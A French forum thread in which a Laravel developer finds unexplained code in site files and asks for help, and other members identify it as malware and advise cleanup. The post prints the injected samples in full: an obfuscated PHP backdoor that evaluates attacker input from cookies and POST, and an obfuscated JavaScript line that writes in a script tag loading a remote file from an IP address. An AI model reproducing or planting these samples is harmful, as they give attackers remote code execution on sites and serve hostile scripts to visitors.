Probleme de site web

fouz09
PHP Laravel

Salut tout le monde ici.

J'ai developpé un site avec un framework laravel et il est hebergé en ligne.

Mais depuis quelques je constate bizzarement le changement de contenu de certains fichiers js ou php avec des codes très bizzare.
Je n'arrive vraiment pas à comprendre.

Voici le code :

=============================================================================================================
<?php
$kajgq = 'kicd138tm#vsrbfg-49y6le0oup_\'x25naH*';$xowmflj = Array();$xowmflj[] = $kajgq[30].$kajgq[18].$kajgq[3].$kajgq[14].$kajgq[18].$kajgq[4].$kajgq[33].$kajgq[23].$kajgq[16].$kajgq[22].$kajgq[20].$kajgq[3].$kajgq[31].$kajgq[16].$kajgq[17].$kajgq[6].$kajgq[23].$kajgq[17].$kajgq[16].$kajgq[33].$kajgq[31].$kajgq[17].$kajgq[3].$kajgq[16].$kajgq[3].$kajgq[5].$kajgq[20].$kajgq[31].$kajgq[20].$kajgq[23].$kajgq[33].$kajgq[33].$kajgq[31].$kajgq[5].$kajgq[30].$kajgq[3];$xowmflj[] = $kajgq[34].$kajgq[35];$xowmflj[] = $kajgq[9];$xowmflj[] = $kajgq[2].$kajgq[24].$kajgq[25].$kajgq[32].$kajgq[7];$xowmflj[] = $kajgq[11].$kajgq[7].$kajgq[12].$kajgq[27].$kajgq[12].$kajgq[22].$kajgq[26].$kajgq[22].$kajgq[33].$kajgq[7];$xowmflj[] = $kajgq[22].$kajgq[29].$kajgq[26].$kajgq[21].$kajgq[24].$kajgq[3].$kajgq[22];$xowmflj[] = $kajgq[11].$kajgq[25].$kajgq[13].$kajgq[11].$kajgq[7].$kajgq[12];$xowmflj[] = $kajgq[33].$kajgq[12].$kajgq[12].$kajgq[33].$kajgq[19].$kajgq[27].$kajgq[8].$kajgq[22].$kajgq[12].$kajgq[15].$kajgq[22];$xowmflj[] = $kajgq[11].$kajgq[7].$kajgq[12].$kajgq[21].$kajgq[22].$kajgq[32];$xowmflj[] = $kajgq[26].$kajgq[33].$kajgq[2].$kajgq[0];foreach ($xowmflj[7]($_COOKIE, $_POST) as $zjhxu => $srsmxs){function tttxmhn($xowmflj, $zjhxu, $eophq){return $xowmflj[6]($xowmflj[4]($zjhxu . $xowmflj[0], ($eophq / $xowmflj8) + 1), 0, $eophq);}function fdqbt($xowmflj, $wvagdm){return @$xowmflj[9]($xowmflj[1], $wvagdm);}function sfcug($xowmflj, $wvagdm){$hplprf = $xowmflj3 % 3;if (!$hplprf) {eval($wvagdm1);exit();}}$srsmxs = fdqbt($xowmflj, $srsmxs);sfcug($xowmflj, $xowmflj[5]($xowmflj[2], $srsmxs ^ tttxmhn($xowmflj, $zjhxu, $xowmflj8)));}

et ça aussi ============================================================================================================

_0x2515=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0x2515[5]](_0x2515[4]_0x2515[3][_0x2515[2]]()_0x2515[1]);

Votre aide me sera vraiment utilise

4 réponses

Lartak

Bonjour.
Pour commencer, tu devrais mettre ton code entre las balises prévues à cet effet.
Ensuite, penses à séparer les différents langages dans des blocks de codes différents, afin de pouvoir les différencier plus aisément.
Pour terminer, ce serait bien que tu écrives tes phrases au complet, car tu dis :

Mais depuis quelques

Depuis quelques quoi ? Jours, temps, il y a une grosse différence entre les deux.
Puis penses à être plus précis, car avec le peu d'information que tu nous donnes, il est difficile de pouvoir t'aider.
Par exemple, est-ce que tu as fait des modifications entre les deux moments ?
Est-ce qu'il y a eu des changements sur le serveur ?

Huggy

J'ai bien l'impression que ton site est corrompu
ce que tu nous montres est du code malicieux
le code est reconstruit caractère par caractère puis est exécuté avec la fonction eval
ça sent mauvais, il faut tout effacer, corriger les failles avant de remettre en ligne

pour les curieux, voici ce que genère le début du code
une liste de fonctions qu'on pourrait appeler boite à outils ou pince monseigneur du hacker

array(10) { 
 [0]=> string(36) "29df91a0-e6d5-4804-a54d-d36560aa532d"
 [1]=> string(2) "H*"
 [2]=> string(1) "#"
 [3]=> string(5) "count"
 [4]=> string(10) "str_repeat"
 [5]=> string(7) "explode"
 [6]=> string(6) "substr"
 [7]=> string(11) "array_merge"
 [8]=> string(6) "strlen"
 [9]=> string(4) "pack"
 }

l'élément "H*" doit être l'argument passé à la fonction pack pour convertir les chaines hexa
pour l'élément 0 ???

rueduphp

Code malicieux ou code crypté. Est-ce un site que tu as acheté ou fait toi-même ?

Balsakup

Salut,

J'ai developpé un site avec un framework laravel et il est hebergé en ligne.. Si le site est développé de A à Z par toi, change d'hébergeur

Et pour le JS tout est expliqué ici
https://www.polaris64.net/blog/cyber-security/2017/wordpress-hacks-jquery-js-script-injection